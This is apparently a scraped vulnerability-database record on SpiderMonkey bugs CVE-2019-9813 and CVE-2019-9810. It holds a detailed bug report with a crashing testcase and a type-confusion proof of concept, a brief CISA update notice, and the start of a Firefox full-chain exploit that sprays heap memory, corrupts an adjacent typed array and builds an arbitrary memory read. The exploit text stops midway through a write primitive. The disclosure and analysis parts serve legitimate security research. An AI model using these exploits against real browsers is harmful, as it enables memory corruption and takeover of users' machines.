properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\\\"widens\\\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through \\\"type barriers\\\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code. \n \n# Crashing Testcase \n \nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties: \n \nfunction hax(o, changeProto) { \nif (changeProto) { \no.p = 42; \no.__proto__ = {}; \n} \no.p = 13.37; \nreturn o; \n} \n \nfor (let i = 0; i < 1000; i++) { \nhax({}, false); \n} \n \nfor (let i = 0; i < 10000; i++) { \nlet o = hax({}, true); \neval('o.p'); \\t\\t\\t// Crash here \n} \n \n \nCrashes in debug builds of Spidermonkey with: \n \nAssertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265 \nHit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266 \n \nThis assertion expresses that type inference data is inconsistent for the property .p as the type \\\"float\\\" is not in the list of possible types but the property currently holds a float value. \n \n# Bug Analysis \n \nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment. \n \nIn detail, the following appears to be happening: \n \nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value. \n \nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will \n \n1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and \n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11]. \n \nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode): \n \n// Verify that the input is an object with ObjectGroup OG1 or OG2 (actually \n// this check is performed before entering the JITed code) \nVerifyInputTypes \n \nif (changeProto) { \n// A SetProperty [12] inline cache [13] which will perform the actual \n// property store and speed up subsequent property stores on objects of \n// the same Shape and Group. Since a type barrier is required, the Group \n// is used as an additional index into the cache so that both Shape and \n// Group must match, in which case no inferred types could be \n// accidentially invalidated. \nSetPropertyICWithTypeBarrier o.p 42 \n \nCall ChangePrototype(o, {}) \n} \n \n// Another inline cache to store property .p again, but this time without a \n// type barrier. As such, only the Shape will be checked and not the Group. \nSetPropertyIC o.p 13.37 \n \nReturn o \n \nAfter compilation finishes, the following happens in the first invocation of the JITed code: \n \n* The function is called with an object of ObjectGroup OG2 and Shape S1 \n* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types \n* The prototype of o is changed \n* This again causes a new ObjectGroup, OG3, to be allocated \n* When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14] \n* As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]} \n* The second propertystore cache runs into a cache miss (because it is empty at this point) \n* Execution transfers to the slow path (a runtime property store) \n* This will store the property and update the inferred types of OG3 to {.p: [int, float]} \n* It will then update the inline cache to now directly handle property stores to objects with shape S1 \n* Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15] \n \nThen, in the second invocation of the JITed code: \n \n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype \n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1) \n* It then directly writes the property value into the property slot without updating inferred types \n \nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval(). \n \nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly: \n \n1. Iterate over the set of possible object types, in this case that is OG1 and OG2 \n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types \n\\t- In this case, OG1 already has the correct type for property .p, so no violation there \n\\t- And OG2 does not even track property types, so again no violation [17] \n3. If no violations were found, no type barrier is needed \n \nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determine that a type barrier is not needed, leading to the scenario described above. \n \n# Exploitation \n \nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved. \n \nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141: \n \nlet ab = new ArrayBuffer(1024); \n \nfunction hax(o, changeProto) { \n// The argument type for |o| will be object of group OG1 or OG2. OG1 will \n// have the inferred types {.p: [Y]}. OG2 on the other hand will be an \n// ObjectGroup with unknown property types due to the prototype change. As \n// such, OG2 will never have any inferred property types. \n \n// Ultimately, this code will confuse types X and Y with each other. \n// Type X: a Uint8Array \nlet x = new Uint8Array(1024); \n// Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :) \nlet y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310}; \n \nif (changeProto) { \no.p = x; \n \n// This prototype change will cause a new ObjectGroup, OG_N, to be \n// allocated for o every time it is executed (because the prototype is \n// stored in the ObjectGroup). During creation of the new ObjectGroup, \n// the current property values will be used to infer property types. As \n// such, OG_N will have the inferred types {.p: [X]}. \no.__proto__ = {}; \n} \n \n// This property write was not marked as requiring type barriers to \n// validate the consistency of inferred property types. The reason is that \n// for OG1, the property type is already correct and OG2 does not track \n// property types at all. However, IonMonkey failed to realize that the \n// ObjectGroup of o could have changed in between to a new ObjectGroup that \n// has different inferred property types. As such, the type barrier \n// omission here is unsafe. \n// \n// In the second invocation, the inline cache for this property store will \n// then be a hit (because the IC only uses the Shape to index the cache, \n// not the Group). As such, the inferred types associated with the \n// ObjectGroup for o will not be updated and will be left inconsistent. \no.p = y; \n \nreturn o; \n} \n \nfunction pwn(o, trigger) { \nif (trigger) { \n// Is on a code path that wasn't executed in the interpreter so that \n// IonMonkey solely relies on type inference instead of type profiles \n// from the interpreter (which would show the real type). \nreturn o.p[0]; \n} else { \nreturn 42; \n} \n} \n \n// \\\"Teach\\\" the function hax that it should accept objects with ObjectGroup OG1. \n// This is required as IonMonkey needs to have at least one \\\"known\\\" type when \n// determining whether it can omit type barriers for property writes: \n// https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282 \nfor (let i = 0; i < 10000; i++) { \nhax({}, false); \n} \n \n// Compile hax to trigger the bug in such a way that an object will be created \n// whose ObjectGroup indicates type X for property .p but whose real type will \n// be Y, where both X and Y can be arbitrarily chosen. \nlet evilObj; \nfor (let i = 0; i < 10000; i++) { \nevilObj = hax({}, true); \n \n// Not sure why this is required here, it maybe prevents JITing of the main \n// script or similar... \neval('evilObj.p'); \n} \n \n// JIT compile the second function and make it rely on the (incorrect) type \n// inference data to omit runtime type checks. \nfor (let i = 0; i < 100000; i++) { \npwn(evilObj, false); \n} \n \n// Finally trigger a type confusion. \npwn(evilObj, true); \n \nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way. \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54 \n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463 \n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87 \n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37 \n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466 \n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469 \n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448 \n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254 \n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/ \n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219 \n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946 \n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280 \n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache \n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259 \n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544 \n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268 \n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293 \n[18] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187 \n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca \n \n \n \nFound by: saelo@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152304/GS20190330004947.txt"}], "cisa": [{"lastseen": "2020-12-18T18:07:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813"], "description": "Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for [Thunderbird 60.6.1](<http://www.mozilla.org/en-US/security/advisories/mfsa2019-12/#CVE-2019-9813>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2019/03/25/Mozilla-Releases-Security-Update-Thunderbird>); we'd welcome your feedback.\n", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "CISA:3568C9A99B63B8D5AC12A7DD1913C3BA", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/03/25/Mozilla-Releases-Security-Update-Thunderbird", "type": "cisa", "title": "Mozilla Releases Security Update for Thunderbird", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "edition": 1, "published": "2019-04-03T00:00:00", "title": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-04-03T00:00:00", "id": "EXPLOITPACK:6998E6040B132C28C7A52F5F3C5E15E8", "href": "", "sourceData": "A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects.\n\n# Prerequisites\n\nIn Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:\n\n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)\n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot\n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array\n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored\n\nSpidermonky makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\"widens\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through \"type barriers\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.\n\n# Crashing Testcase\n\nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:\n\n function hax(o, changeProto) {\n if (changeProto) {\n o.p = 42;\n o.__proto__ = {};\n }\n o.p = 13.37;\n return o;\n }\n\n for (let i = 0; i < 1000; i++) {\n hax({}, false);\n }\n\n for (let i = 0; i < 10000; i++) {\n let o = hax({}, true);\n eval('o.p'); \t\t\t// Crash here\n }\n\n\nCrashes in debug builds of Spidermonkey with:\n\n Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265\n Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266\n\nThis assertion expresses that type inference data is inconsistent for the property .p as the type \"float\" is not in the list of possible types but the property currently holds a float value.\n\n# Bug Analysis\n\nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.\n\nIn detail, the following appears to be happening:\n\nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.\n\nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will\n\n1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and\n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].\n\nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode):\n\n // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually\n // this check is performed before entering the JITed code)\n VerifyInputTypes\n\n if (changeProto) {\n // A SetProperty [12] inline cache [13] which will perform the actual\n // property store and speed up subsequent property stores on objects of\n // the same Shape and Group. Since a type barrier is required, the Group\n // is used as an additional index into the cache so that both Shape and\n // Group must match, in which case no inferred types could be\n // accidentially invalidated.\n SetPropertyICWithTypeBarrier o.p 42\n\n Call ChangePrototype(o, {})\n }\n\n // Another inline cache to store property .p again, but this time without a\n // type barrier. As such, only the Shape will be checked and not the Group.\n SetPropertyIC o.p 13.37\n\n Return o\n\nAfter compilation finishes, the following happens in the first invocation of the JITed code:\n\n* The function is called with an object of ObjectGroup OG2 and Shape S1\n* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types\n* The prototype of o is changed\n * This again causes a new ObjectGroup, OG3, to be allocated\n * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]\n * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}\n* The second propertystore cache runs into a cache miss (because it is empty at this point)\n * Execution transfers to the slow path (a runtime property store)\n * This will store the property and update the inferred types of OG3 to {.p: [int, float]}\n * It will then update the inline cache to now directly handle property stores to objects with shape S1\n * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]\n\nThen, in the second invocation of the JITed code:\n\n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype\n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)\n* It then directly writes the property value into the property slot without updating inferred types\n\nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().\n\nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:\n\n1. Iterate over the set of possible object types, in this case that is OG1 and OG2\n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types\n\t- In this case, OG1 already has the correct type for property .p, so no violation there\n\t- And OG2 does not even track property types, so again no violation [17]\n3. If no violations were found, no type barrier is needed\n\nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determine that a type barrier is not needed, leading to the scenario described above.\n\n# Exploitation\n\nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.\n\nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:\n\n let ab = new ArrayBuffer(1024);\n\n function hax(o, changeProto) {\n // The argument type for |o| will be object of group OG1 or OG2. OG1 will\n // have the inferred types {.p: [Y]}. OG2 on the other hand will be an\n // ObjectGroup with unknown property types due to the prototype change. As\n // such, OG2 will never have any inferred property types.\n\n // Ultimately, this code will confuse types X and Y with each other.\n // Type X: a Uint8Array\n let x = new Uint8Array(1024);\n // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)\n let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};\n\n if (changeProto) {\n o.p = x;\n\n // This prototype change will cause a new ObjectGroup, OG_N, to be\n // allocated for o every time it is executed (because the prototype is\n // stored in the ObjectGroup). During creation of the new ObjectGroup,\n // the current property values will be used to infer property types. As\n // such, OG_N will have the inferred types {.p: [X]}.\n o.__proto__ = {};\n }\n\n // This property write was not marked as requiring type barriers to\n // validate the consistency of inferred property types. The reason is that\n // for OG1, the property type is already correct and OG2 does not track\n // property types at all. However, IonMonkey failed to realize that the\n // ObjectGroup of o could have changed in between to a new ObjectGroup that\n // has different inferred property types. As such, the type barrier\n // omission here is unsafe.\n //\n // In the second invocation, the inline cache for this property store will\n // then be a hit (because the IC only uses the Shape to index the cache,\n // not the Group). As such, the inferred types associated with the\n // ObjectGroup for o will not be updated and will be left inconsistent.\n o.p = y;\n\n return o;\n }\n\n function pwn(o, trigger) {\n if (trigger) {\n // Is on a code path that wasn't executed in the interpreter so that\n // IonMonkey solely relies on type inference instead of type profiles\n // from the interpreter (which would show the real type).\n return o.p[0];\n } else {\n return 42;\n }\n }\n\n // \"Teach\" the function hax that it should accept objects with ObjectGroup OG1.\n // This is required as IonMonkey needs to have at least one \"known\" type when\n // determining whether it can omit type barriers for property writes:\n // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282\n for (let i = 0; i < 10000; i++) {\n hax({}, false);\n }\n\n // Compile hax to trigger the bug in such a way that an object will be created\n // whose ObjectGroup indicates type X for property .p but whose real type will\n // be Y, where both X and Y can be arbitrarily chosen.\n let evilObj;\n for (let i = 0; i < 10000; i++) {\n evilObj = hax({}, true);\n\n // Not sure why this is required here, it maybe prevents JITing of the main\n // script or similar...\n eval('evilObj.p');\n }\n\n // JIT compile the second function and make it rely on the (incorrect) type\n // inference data to omit runtime type checks.\n for (let i = 0; i < 100000; i++) {\n pwn(evilObj, false);\n }\n\n // Finally trigger a type confusion.\n pwn(evilObj, true);\n\nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way.\n\n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54\n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463\n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87\n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37\n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466\n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469\n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448\n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254\n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/\n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219\n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946\n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280\n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache\n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259\n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544\n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268\n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293\n[18] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187\n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca\n\n Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120\n\n\n Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)\n\nThe issue was fixed in two ways:\n\n1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.\n\n2. in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:23", "description": "\nMozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack", "edition": 1, "published": "2019-12-07T00:00:00", "title": "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810", "CVE-2019-11708"], "modified": "2019-12-07T00:00:00", "id": "EXPLOITPACK:63A0D5452D21EF0FAB97365E7C125A53", "href": "", "sourceData": "// Axel '0vercl0k' Souchet - November 19 2019\n\n// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip\n\n// 0:000> ? xul!sAutomationPrefIsSet - xul\n// Evaluate expression: 85724947 = 00000000`051c0f13\nconst XulsAutomationPrefIsSet = 0x051c0f13n;\n// 0:000> ? xul!disabledForTest - xul\n// Evaluate expression: 85400792 = 00000000`05171cd8\nconst XuldisabledForTest = 0x05171cd8n;\n\nconst Debug = false;\nconst dbg = p => {\n if(Debug == false) {\n return;\n }\n\n print(`Debug: ${p}`);\n};\n\nconst ArraySize = 0x5;\nconst WantedArraySize = 0x42424242;\n\nlet arr = null;\nlet Trigger = false;\nconst Spray = [];\n\nfunction f(Special, Idx, Value) {\n arr[Idx] = 0x41414141;\n Special.slice();\n arr[Idx] = Value;\n}\n\nclass SoSpecial extends Array {\n static get [Symbol.species]() {\n return function() {\n if(!Trigger) {\n return;\n }\n\n arr.length = 0;\n for(let i = 0; i < 0x40000; i++) {\n Spray.push(new Uint32Array(ArraySize));\n }\n };\n }\n};\n\nfunction GetMeBiggie() {\n for(let Idx = 0; Idx < 0x100000; Idx++) {\n Spray.push(new Uint32Array(ArraySize));\n }\n\n const SpecialSnowFlake = new SoSpecial();\n for(let Idx = 0; Idx < 10; Idx++) {\n arr = new Array(0x7e);\n Trigger = false;\n for(let Idx = 0; Idx < 0x400; Idx++) {\n f(SpecialSnowFlake, 0x70, Idx);\n }\n\n Trigger = true;\n f(SpecialSnowFlake, 47, WantedArraySize);\n if(arr.length != 0) {\n continue;\n }\n\n const Biggie = Spray.find(e => e.length != ArraySize);\n if(Biggie != null) {\n return Biggie;\n }\n }\n\n return null;\n}\n\nfunction ExploitCVE_2019_9810() {\n print = console.log;\n\n const Biggie = GetMeBiggie();\n if(Biggie == null || Biggie.length != WantedArraySize) {\n dbg('Failed to set things up :(.');\n return false;\n }\n\n //\n // Scan for one of the Uint32Array we sprayed earlier.\n //\n\n let Biggie2AdjacentSize = null;\n const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);\n for(let Idx = 0; Idx < 0x100; Idx++) {\n const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);\n if(Qword == JSValueArraySize) {\n Biggie2AdjacentSize = Idx + 1;\n break;\n }\n }\n\n if(Biggie2AdjacentSize == null) {\n dbg('Failed to find an adjacent array :(.');\n return false;\n }\n\n //\n // Use the array length as a marker.\n //\n\n const AdjacentArraySize = 0xbbccdd;\n Biggie[Biggie2AdjacentSize] = AdjacentArraySize;\n\n //\n // Find the array now..\n //\n\n const AdjacentArray = Spray.find(\n e => e.length == AdjacentArraySize\n );\n\n if(AdjacentArray == null) {\n dbg('Failed to find the corrupted adjacent array :(.');\n return false;\n }\n\n const ReadPtr = Addr => {\n const SizeInDwords = 2;\n const SavedSlot = [\n Biggie[Biggie2AdjacentSize],\n Biggie[Biggie2AdjacentSize + 2 + 2],\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\n ];\n\n //\n // Corrupt the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\n\n //\n // Read arbitrary location now.\n //\n\n const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);\n\n //\n // Restore the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\n return Ptr;\n };\n\n const WritePtr = (Addr, Value) => {\n const 